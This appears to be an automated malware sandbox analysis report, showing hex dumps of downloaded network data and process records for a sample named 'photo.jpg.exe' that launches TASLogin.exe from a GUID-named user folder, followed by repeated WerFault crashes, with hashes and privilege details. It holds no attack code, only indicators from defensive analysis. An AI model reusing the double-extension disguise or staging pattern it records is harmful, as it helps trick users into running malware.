                                      2025-04-02 14:23:09 UTC16384INData Raw: 28 df 94 f1 60 53 ad 15 cf dc fe 50 0b 48 26 3c b3 2b 6c a2 c4 44 94 bf af 38 e8 37 e0 4a 28 58 6e aa 24 30 2c df 5b 3c 2a 83 39 1d 3f 3d f2 e8 e5 e9 c2 20 f5 ba 92 61 5e 63 04 c0 bf ad 31 69 95 a1 a6 e1 68 33 45 eb 59 d2 06 a6 f7 dc 43 af 56 0c 00 4f 71 23 a0 52 41 da 4d 78 5a b7 b5 0e d9 c2 d6 de 23 98 83 f4 f7 13 db 86 15 81 dc 0d 60 90 f4 81 8d 09 a6 10 a6 dc 1c 56 5a 14 70 b4 d8 4d c2 01 0c 20 fc 48 ff 06 15 d5 73 de aa ef 52 45 47 c5 73 c4 09 19 14 f5 52 39 2f f2 b5 a3 d7 3b 07 0c 7a bd ec ce ef 62 e8 bc 2f c2 d1 05 3d 21 38 be 96 d5 f6 da af 97 ba f8 9f 03 6d 34 ea ac 82 a5 9d 0a 4c e8 35 ba 89 36 df 2e 60 cd 59 f4 ac a3 e9 8d 74 fa 73 87 f2 74 5d aa 42 40 35 b0 8c 9a 67 e7 83 83 69 9e 5d 74 53 a4 a1 5c 0d 25 7a 7e 3f ce f5 98 29 ff 0d 23 e5 71 86
                                      Data Ascii: (`SPH&<+lD87J(Xn$0,[<*9?= a^c1ih3EYCVOq#RAMxZ#`VZpM HsREGsR9/;zb/=!8m4L56.`Ytst]B@5gi]tS\%z~?)#q
                                      2025-04-02 14:23:09 UTC1024INData Raw: 60 d2 51 73 af 47 59 02 08 80 d3 b2 3b 56 6f ee 97 77 91 42 59 5f b2 a0 7c 96 e7 51 6d fe b2 21 cf 8d e7 54 68 2f fc 7a c7 1a d3 49 a0 71 20 ca 9e cc fb 9c 67 4d a6 19 99 5d 86 dc 18 ad 06 20 5a bb 6d 8c 46 e7 cc 0b 55 cc b9 37 a2 cf 7b 68 05 f6 d0 db 25 d5 ee 9a 23 81 ae f4 d9 39 38 bc d1 08 cd ba 17 ce 94 01 55 2f c6 cc 11 97 72 12 1a 6f b1 ec ad f4 1b d4 aa f2 81 d0 39 8b d9 ee 91 60 0f f7 ca 09 4c 04 16 6a 4d d8 49 1e 1a c0 42 6f 49 88 6d 7c 37 50 d2 ec 6d e8 a5 06 b8 e5 dc 1b c9 26 a9 d2 cf ba 24 9c 4e 1a 60 e0 1a 54 83 7e db a0 70 5d d8 5c 88 be 00 c2 94 91 74 49 83 54 0d 5b 53 20 ba c2 72 3d c6 85 36 2f 45 17 77 66 53 93 ca ca a5 8f 55 01 26 89 9f 5c a3 2d ef b6 d0 ae be 48 80 27 07 dd 4b 0a dd 54 4d 64 b7 cc b0 79 00 95 a0 de 62 46 23 30 e9 39 82
                                      Data Ascii: `QsGY;VowBY_|Qm!Th/zIq gM] ZmFU7{h%#98U/ro9`LjMIBoIm|7Pm&$N`T~p]\tIT[S r=6/EwfSU&\-H'KTMdybF#09
                                      2025-04-02 14:23:09 UTC16384INData Raw: 83 00 b6 96 ba 0f bd ba bb 2d 64 67 f5 f9 4a 9a 6c f0 bd f1 c0 9b 65 37 a0 66 a7 a1 a1 4a 1b 60 43 eb ae 10 ad be 2f 1e d5 9c 17 2e 3b 35 69 07 9e 63 ae 85 0b d5 e2 b1 c5 53 52 78 97 23 25 57 c4 ae 5c ab 0c d5 33 02 89 be cf cd 1e 16 f8 aa 99 ee c1 f7 92 e5 c1 54 d9 f8 cb 8d d2 26 68 57 e2 8b 6f f5 7c c6 b1 e9 3b 89 8a 9d 50 03 8c af 0d f2 a3 81 08 25 6f 41 32 b1 75 9f 60 ac 48 10 03 f4 ad a9 07 e7 69 24 c6 36 26 64 47 bc ab f7 e2 e9 43 69 9b 28 ca 84 55 86 3d 4d f6 53 66 d5 b0 65 69 b7 60 4f e2 58 eb a4 f4 7c 02 d4 e9 a1 a1 02 70 8f a2 fb 85 13 d4 94 ca a6 c2 76 8c 5f c7 8f c6 32 d7 9b e5 8e 40 75 36 ff 5d dc f0 aa dd bb 68 d3 e6 d2 e5 2e 57 98 df 21 c3 e3 79 36 ca 7e bc 68 c5 02 e8 1e e2 88 d3 d2 71 96 dc 7d be e2 e0 f7 e7 d9 87 45 47 33 62 25 5d ee 88
                                      Data Ascii: -dgJle7fJ`C/.;5icSRx#%W\3T&hWo|;P%oA2u`Hi$6&dGCi(U=MSfei`OX|pv_2@u6]h.W!y6~hq}EG3b%]
                                      2025-04-02 14:23:09 UTC1024INData Raw: 3d 65 eb 27 a8 cc b2 f9 44 1d 62 52 67 1d d7 22 78 f9 d1 fc 39 c5 b7 2d 22 d8 b2 aa 0a e8 cd db 28 1d 6a 49 8a e8 3c 51 3d e3 17 c0 9d ce 54 1c 82 c2 55 4b eb 0c 73 00 b3 bc 62 6c 14 e3 17 43 64 b9 d4 da 52 33 8a 1b eb 87 18 1f a8 71 ea 81 4e e9 de 24 41 dd b3 48 31 6a e3 27 a2 de 0c 50 be f2 5e dc ca c7 ed 8f ec ef 8f b4 f0 fd c3 da 88 2d e9 ec 88 b6 cc 73 e8 32 83 ef 01 04 f5 c3 b8 70 3c 74 5e f2 31 b8 53 93 5f b1 17 b7 59 7c 61 5c 5c 5a 33 3e b1 21 a4 f4 f3 8f fc f9 ea 38 4f c4 e8 c3 5f 4f 59 62 a9 51 4c 19 04 e6 5f e6 72 b2 e7 8c 1c be 91 9e 8d f2 da 7b 8d 47 03 4a f5 c5 ea 0b 7c f8 1b e2 78 7a cc 8c 85 00 22 c2 3e 89 1e ed 4f 6e ec b9 1a 73 31 46 93 2f 2c 29 be bf 7e 26 8b dd 7e 0d 9a 56 5b fd 0c 4e 52 bf 86 dc a6 77 52 4c db aa f7 ea 7c e1 c4 8b d9
                                      Data Ascii: =e'DbRg"x9-"(jI<Q=TUKsblCdR3qN$AH1j'P^-s2p<t^1S_Y|a\\Z3>!8O_OYbQL_r{GJ|xz">Ons1F/,)~&~V[NRwRL|
                                      2025-04-02 14:23:09 UTC16384INData Raw: 95 5b 68 73 76 b7 b5 4d 55 83 b4 17 75 16 6d 1c b1 20 b4 5c 01 80 63 d7 4f 30 49 b0 3a 9c 5d 86 de 2b 62 24 8e 69 4a 3b a1 15 b8 9f 63 2c 28 30 96 90 74 29 07 63 c4 55 62 92 9f 31 4c ff 2a de eb 25 24 17 63 b8 5e ca 7c 11 98 72 13 42 0d 60 54 15 26 8a dc 84 c4 7b fa 6f bd a9 25 fd 6f b8 e0 fd 36 8a c1 49 b4 6d 73 31 4e 9f 99 a8 b0 85 6d 57 2d 0b 71 24 2d dc 35 33 c1 6a d0 bb a9 d4 9b 16 cd 24 bf 24 2a 8d d9 2c a9 12 cb 27 20 57 e4 b6 9d 86 bc af 9b ca b1 5a 1c de 55 b3 4e b3 aa c0 cc 2c a5 c8 a8 71 3c 97 07 cc a2 13 16 52 d6 ac 88 21 a5 49 e2 28 a2 47 a3 eb ba 57 3f ed b4 fe 59 7d 02 fa 1a 6a d5 e7 45 df ca b8 d7 56 77 6f 1c 38 3a 9f 33 c3 60 f7 6b 2a 4c 6a c3 ca 96 e0 65 e5 1f 44 ed f5 78 83 d2 ca 49 56 ea 6c fd 02 19 7f c8 c5 90 82 e6 db 2c 04 f3 2b 18
                                      Data Ascii: [hsvMUum \cO0I:]+b$iJ;c,(0t)cUb1L*%$c^|rB`T&{o%o6Ims1NmW-q$-53j$$*,' WZUN,q<R!I(GW?Y}jEVwo8:3`k*LjeDxIVl,+
                                      2025-04-02 14:23:09 UTC1024INData Raw: dc b7 43 87 24 e2 92 c7 97 e8 1f fb 65 dd 6e 0b 4c b1 1e 51 ba e1 2b f6 6b 16 fb 44 47 12 92 cd 0a c1 79 b4 b0 d2 63 bd c1 21 6a 7d 7f dc 76 e1 60 82 48 17 c1 84 69 5c 49 a7 f6 19 24 44 78 00 d3 1b d8 ad 51 85 94 a1 17 fc 6d 09 8b ee b7 38 a7 24 a9 77 ed 0f 98 a4 ca 61 2b 21 76 6e 26 2b e4 26 f3 2e 30 8c 2e 72 8b d5 17 4b 8f 81 92 d5 7a 95 ea e3 1e 74 96 a0 a8 4f a2 2a 09 ef e7 1d 57 56 1b 8e 87 f1 52 a3 90 b3 b6 d2 bd cd bb 73 78 a3 ff 17 83 94 f1 9d 2f 06 42 63 fb 5d 26 1a d7 f9 0f 06 81 e1 74 6e 60 5b 55 18 56 ab 6a 96 a4 c6 45 77 8c 56 39 80 43 3a 67 05 0d 6d ee 50 80 e1 51 73 ad df 5c 66 b9 71 76 33 a7 f6 9f e2 07 fe 09 bf bd 1d d0 a7 5d 46 b5 ca 5a 4d 71 14 c5 df 30 ae d8 28 d9 04 24 65 ef f6 84 e1 d6 60 ba 97 8d 0b ad 61 97 e9 1c 70 b2 b7 42 34 31
                                      Data Ascii: C$enLQ+kDGyc!j}v`Hi\I$DxQm8$wa+!vn&+&.0.rKztO*WVRsx/Bc]&tn`[UVjEwV9C:gmPQs\fqv3]FZMq0($e`apB41


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      • File
                                      • Registry
                                      • Network

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:10:22:27
                                      Start date:02/04/2025
                                      Path:C:\Users\user\Desktop\photo.jpg.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\photo.jpg.exe"
                                      Imagebase:0x240000
                                      File size:289'438 bytes
                                      MD5 hash:A5FB35B15C22B46A62905BF7A9F492BF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Show Windows behavior

                                      Network Activities

                                      Process Token Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:14
                                      Start time:10:23:09
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 3%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Network Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:17
                                      Start time:10:23:11
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:19
                                      Start time:10:23:12
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:20
                                      Start time:10:23:20
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Reputation:moderate
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      Show Windows behavior

                                      COM Activities

                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Network Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:22
                                      Start time:10:23:22
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:24
                                      Start time:10:23:23
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:25
                                      Start time:10:23:28
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Reputation:moderate
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Network Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:27
                                      Start time:10:23:30
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:29
                                      Start time:10:23:31
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Disassembly

                                      No disassembly